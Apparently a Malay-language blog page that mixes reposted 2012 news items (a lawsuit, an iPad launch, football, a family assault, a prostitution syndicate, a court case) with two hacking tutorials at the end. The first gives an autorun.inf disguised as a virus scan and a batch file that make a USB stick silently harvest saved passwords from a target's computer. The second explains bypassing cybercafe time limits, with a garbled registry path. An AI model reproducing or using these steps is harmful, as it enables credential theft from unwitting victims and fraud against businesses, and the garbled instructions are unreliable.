Wednesday, 18 April 2012

Saman kerana dikhatan




SIOUX FALLS (Dakota Selatan): Seorang tahanan penjara menyaman hospital di mana dia dikhatankan ketika bayi, mengatakan dia baru menyedari sejak kebelakangan ini dia telah menjalani prosedur yang melemahkan tenaga batinnya.
Dean Cochrun, 28, menuntut kerugian AS$1,000 (RM3,000) sebagai ganti rugi dan kerosakan besar. Dalam kes mahkamah itu, dia juga meminta kulit organ sulit itu diganti “dengan harapan dapat menjadi sempurna semula” walaupun memaklumkan dia tidak mengharapkan penggantian semula selain kulit palsu. Cochrun yang dipenjarakan kerana kesalahan menculik memfailkan kes saman persekutuan itu terhadap Hospital Sanford, Jumaat lalu. Cochrun mendakwa seorang “doktor tidak dikenali” memperdaya ibunya untuk percaya prosedur itu perlu secara perubatan. Dia mempertikaikan bahawa prosedur itu tidak perlu, tidak etika dan tidak memberi faedah secara perubatan.

“Saya baru menyedari sejak kebelakangan ini bahawa saya dikhatankan dan saya kehilangan daya kepekaan ketika melakukan persetubuhan, selain rasa kurang yakin dengan kemampuan diri sendiri,” katanya dalam kes mahkamah itu. Cochrun menegaskan dia mahupun pasangannya tidak “mempunyai daya kepekaan ketika melakukan hubungan seksual serta tidak mempunyai kehidupan seksual yang normal.” - AP

Apple mula jual iPad baru di Malaysia, 11 negara lain Jumaat ini




CUPERTINO (California): Apple semalam mengumumkan, iPad barunya produk kategori generasi ketiga dalam kategorinya akan mula dipasarkan di Korea Selatan serta 11 negara lain, lusa.
Produk terbaru itu dilengkapi paparan Retina yang mengagumkan, selain cip A5X baru Apple dengan grafik quad-core serta kamera iSight berkeupayaan 5 megapiksel.

Ia juga mempunyai optik maju untuk merakamkan gambar dengan lebih hebat serta video HD 1080p.
Selain kekal nipis dan ringan, iPad terbaru itu juga dilengkapi bateri yang mampu bertahan sehingga 10 jam.

Selain Korea Selatan, iPad baru itu juga mula dijual di Brunei, Croatia, Cyprus, Republik Dominica, El Salvador, Guatemala, Malaysia, Panama, St Maarten, Uruguay dan Venezuela mulai Jumaat ini.

Untuk pelanggan di Colombia, Estonia, India, Israel, Latvia, Lithuania, Montenegro, Afrika Selatan dan Thailand pula, mereka berpeluang membelinya mulai 27 April.
iPad model wi-fi dihasilkan dengan dua warna - hitam atau putih - dengan harga runcit AS$499 (RM 1,523) untuk model 16GB, AS$599 (RM1,828) untuk model 32GB dan AS$699 (RM2,133) untuk model 64GB. Untuk iPad yang dilengkapi kemudahan wi-fi dan 4G, harga runcit yang disarankan Apple ialah AS$629 (RM1,927) bagi model 16GB, AS$729 (RM2,235) untuk model 32GB dan AS$829 (RM2,542) untuk model 64GB model.

Ia boleh dibeli di kedai dalam talian Apple (www.apple.com) dan semua pengedar bertauliah syarikat itu di negara berkenaan. - TS


Misi Wan Zack


WAN ZACK...harap rakan sepasukan benam Sri Lanka.
WAN ZACK...harap rakan sepasukan benam Sri Lanka.
KEMENANGAN perlu direalisasi skuad negara apabila menentang Sri Lanka dalam aksi persahabatan berstatus A di Stadium Shah Alam, Sabtu depan bagi ‘menggembirakan’ penyokong tempatan.
Ini kerana kemenangan terakhir diraih skuad kendalian Datuk K Rajagobal di pentas antarabangsa kira-kira 10 bulan lalu apabila menewaskan Taiwan, 2-1 di Stadium Nasional Bukit Jalil pada 29 Jun 2011.

Selepas itu penyokong dan peminat negara hanya disajikan keputusan seri dan kekalahan menentang Singapura (dua perlawanan), Australia, India (dua perlawanan) dan terakhir bangkit mengikat Filipina 1-1 pada Februari lalu.
Hakikat itu turut diakui pemain sayap negara, Wan Zack Haikal Wan Nor yang menyifatkan kemenangan diperlukan bagi memberi kepuasan kepada penyokong dan peminat skuad negara.

“Kami akan berusaha mencipta kemenangan terutamanya bagi memberi ‘hadiah’ kepada mereka yang sentiasa memberikan sokongan. Walaupun tanpa kehadiran sejumlah pemain utama, saya yakin kami tidak akan berdepan masalah untuk melakukannya,” katanya yang dipanggil kali kedua menyertai skuad negara.

Namun pemain muda berusia 21 tahun itu tetap mengingatkan diri sendiri dan rakan sepasukan agar tidak mengambil mudah lawan yang berada di ranking lebih rendah berbanding skuad negara iaitu ke-181 dunia.
“Kami perlu sentiasa berwaspada sepanjang perlawanan berlangsung. Sebarang kemungkinan atau keputusan di luar jangkaan boleh berlaku jika lalai,” kata pemain Harimau Muda A itu.

Bagi perlawanan itu, Rajagobal tidak memanggil sejumlah tonggak utama yang beraksi untuk Kelantan dan Terengganu dalam Piala AFC sekali gus memberi peluang kepada pemain lain untuk membuktikan kemampuan namun penyerang sensasi negara, Mohd Safee Sali dijangka menjadi harapan utama merobek gawang Sri Lanka.

‘Kau kahwin atau nak mati?’




KUALA LUMPUR: Kahwin atau dibunuh itu kata dua diberikan seorang bapa kepada anak perempuannya yang dipaksa berkahwin dengan lelaki pilihannya ketika berbincang di rumah mereka di Kepong Baru, dekat sini Ahad lalu.
Malah, lebih kejam wanita berusia 27 tahun terbabit turut dipukul sebelum dihalau keluar selepas mangsa tidak bersetuju dengan rancangan bapanya berusia 50-an yang ingin menjodohkan dengan lelaki tidak dikenalinya.

Akibatnya, mangsa menumpang di rumah rakannya sebelum dinasihatkan membuat laporan polis.
Mangsa nekad membuat laporan di Balai Polis Jinjang.

Menceritakan semula kejadian itu, sumber berkata, mangsa yang pulang ke rumah jam 9 malam dipanggil ibu bapanya ke ruang tamu untuk berbincang sesuatu.

“Mangsa pada mulanya menolak secara baik permintaan keluarganya itu tambahan dia tidak mengenali bakal suami. Bagaimanapun, tindakannya itu mengundang padah apabila si bapa memarahinya,” katanya.
Sumber berkata, terkejut dengan sikap bapanya itu, mangsa memberitahu dia tidak bersedia untuk berkahwin tambahan belum mengenali hati budi bakal suaminya.

“Geram anaknya enggan bersetuju dengan rancangan perkahwinan itu, lelaki terbabit yang gagal mengawal kemarahan menampar pipi mangsa beberapa kali.
“Malah, bagaikan dirasuk, anaknya dipukul menyebabkan mangsa yang kesakitan merayu dilepaskan,” katanya.

Menurutnya, mujur ibu mangsa membantu dan meminta suami bersabar dan memujuk anaknya supaya bersetuju dengan perkahwinan terbabit.

“Si bapa yang masih marah memberi kata dua kepada mangsa sama ada dia bersetuju untuk berkahwin atau dibunuh.

“Namun, mangsa berdegil dan memberitahu dia enggan berkahwin menyebabkan bapanya menghalaunya dari rumah,” katanya.

Sementara itu, Ketua Polis Daerah Sentul, Asisten Komisioner Zakaria Pagan mengesahkan menerima laporan dan siasatan lanjut dijalankan.

Borang jual tubuh




KUALA LUMPUR: Sindiket pelacuran yang beroperasi menggunakan Internet dikesan turut menyediakan borang khusus bagi merekrut wanita tempatan untuk dijadikan pelacur dengan menawarkan pakej sepenuh atau separuh masa dengan syarat cukup mudah.
Bagi wanita yang berminat, mereka perlu mengisi borang berkenaan dengan menyertakan nama, gambar muka dan saiz ukuran badan, gaya rambut, warna kulit, alamat dan nombor telefon yang boleh dihubungi.
Selepas gadis yang rambang mata dan berfikiran singkat mengisi serta menghantar ‘borang ke neraka’ itu ke alamat e-mel tertera, ahli sindiket akan menghubungi, seterusnya menawarkan pakej disediakan tanpa perlu bertemu.

Jika persetujuan dicapai, wanita berkenaan perlu menunggu panggilan telefon daripada ahli sindiket terbabit yang mencarikan pelanggan sebelum mengarahkan wanita itu pergi ke mana-mana hotel atau rumah yang dipilih pelanggan.

Sindiket itu menggunakan laman web yang pelayannya beroperasi di luar negara turut mempromosi pelacur dengan pakej mengikut kategori tertentu iaitu pelajar, gadis luar negara, suri rumah, setiausaha dan pekerja pejabat pada harga RM100 hingga RM4,000 sejam mengikut selera pelanggan.



Dapatkan akhbar Harian Metro untuk berita selanjutnya.

Keputusan dua beradik mohon murtad 10 Mei




PULAU PINANG 18 April - Mahkamah Tinggi Syariah di sini hari ini menangguhkan sehingga 10 Mei ini keputusan bantahan awal kes dua beradik yang memohon mendapatkan pengisytiharan keluar daripada agama Islam (murtad).
Hakim Syarie, Othman Ibrahim menetapkan tarikh tersebut bagi membolehkan mahkamah menyediakan alasan penghakiman sebelum keputusan kes dibuat.
Dalam kes yang difailkan penghujung 2010, Roslina Abdul Rashid dan adiknya, Rosli masing-masing berumur 30-an selaku plaintif, menamakan Majlis Agama Islam Pulau Pinang (MAIPP) sebagai defendan.
Permohonan itu dikemukakan berikutan undang-undang yang mula terpakai sejak 1 Januari 2006 lanjutan kepada Seksyen 61 Enakmen Pentadbiran Agama Islam (Negeri Pulau Pinang) 2004 memberi kuasa kepada mahkamah untuk mendengar dan memutuskan semua tindakan serta prosiding membabitkan perisytiharan bahawa seseorang itu bukan lagi orang Islam. - UTUSAN

Tawaran ganjaran RM20,000 tangkap ikan naga di Tasik Kenyir



KUALA TERENGGANU 18 April - Kerajaan negeri meningkatkan habuan wang tunai menjadi RM20,000 kepada kaki pancing yang berjaya menangkap ikan naga yang dipercayai hidup di Tasik Kenyir.
Menteri Besar, Datuk Seri Ahmad Said berkata, tawaran
itu merupakan perhatian serius kerajaan negeri kerana kehadiran ikan itu boleh menyebabkan spesies ikan lain di Tasik Kenyir pupus.
Katanya, tawaran itu dibuat berikutan ganjaran RM10,000 sejak tahun 2009 itu gagal menarik ramai pemancing untuk memburu ikan itu.
“Jika usaha menangkap dilakukan sekarang tidak berhasil, kita bercadang menaikkan ganjaran. Ini bukan usaha main-main. Yang penting ikan itu dapat ditangkap hidup-hidup,” katanya kepada pemberita di Wiswa Darul Iman, di sini hari ini. - UTUSAN

Acara sukan utama boleh disaksikan di semua saluran TV mulai 1 Mei




TANJUNG MALIM 18 April - Mulai 1 Mei ini, semua rancangan sukan termasuk Liga Perdana Inggeris (EPL) tidak lagi dimonopoli oleh televisyen tertentu tetapi boleh disaksikan di stesen-stesen televisyen lain di negara ini.
Menteri Penerangan, Komunikasi dan Kebudayaan, Datuk Seri Dr. Rais Yatim mengumumkan perkara tersebut semasa melancarkan `RTM Mobile' Sempena Ulang Tahun Radio Televisyen Malaysia (RTM) Ke-66 di Universiti Pendidikan Sultan Idris di sini hari ini. - UTUSAN

Hack Menggunakan Pendrive





Assalamualaikum...
Hari ni Admin akan berkongsi dengan korang bagaimana untuk hack password komputer
sesiapa dalam mase yang sangat singkat.. keh3..

Korang download semua yang kat bawah ni


Korang buka notepad dan korang copy dan paste kod yang aku bagi korang kat bawah ni.

[autorun]
open=pensil.bat
ACTION= Perform a Virus Scan
 

save serta namakan sebagai autorun.inf

Selepas save korang bula notepad baru masukkan kod kat bawah ni pulak

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Dan simpan sebagai pensil.bat  dan save didalam pendrive korang..
sekarang korang dah boleh akses password orang.

Step1. Masukkan ke komputer target..

Step2.  Popup window akan keluar. dan pilih option pertama (Perform a Virus Scan).

Step3. Sekarang semua password target akan tersimmpan di fail .txt.

Step4  Tanggalkan pendrive dari komputer target. dan korang dapat lihat password  pada fail .txt

Note: Trick ini hanya untuk recover balik password2 yang tersimpan dalam mana-mana komputer  
akan berkesan pada Windows 2000, XP and Vista sahaja window lain skill lain la keh3..

Cara Hack Masa Cybercafe !!





Assalamualaikum..
Cara untuk hack CC main tanpa had masa ni bukan la susah sangat. Tidak semua CC boleh buat hack ini kerana bukan semua CC pakai software yang sama.Hanya 80% cc saja boleh guna cara dibawah . Keh3..Ok tanpa buang masa kita ke langkah2 hack cybercafe:)

Step 1.Korang buka command prompt (start>run>cmd)
Step 2.Pastu dah buka cmd korang taip cd\windows
Step 3.Pastu taip Regedit
Step 4.Oke Sekarang korang pergi cari 
HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current
version>internet settings>policies>system
Step 5. Korang cari Disable Task manager rightclick on kan scroll bawah pastu bagi value dia 0
Step 6.Pastu korang open task manager  (CTRL+ALT+DELETE)
Step 7. Korang disable Internet cafe Timer.

Settle.. Korang bleh try..


Cara Ke 2

Korang boleh juga hack pakai software contohnya GVR.. korang download kat
link Admin bagi.



Download

Step 1. Lepas korang dah download korang extract dan install( xyah runsing ringan je software ni keh3.. )

Step 2.Pergi kat tool>kill all process ...


Step 3.Pastu da ikut step 2 korang pergi semula di tool>registry repair  (tunggu sampai habis repair)


pastu tutup.. Mudah kan?? :) 



Selamat mencuba.. !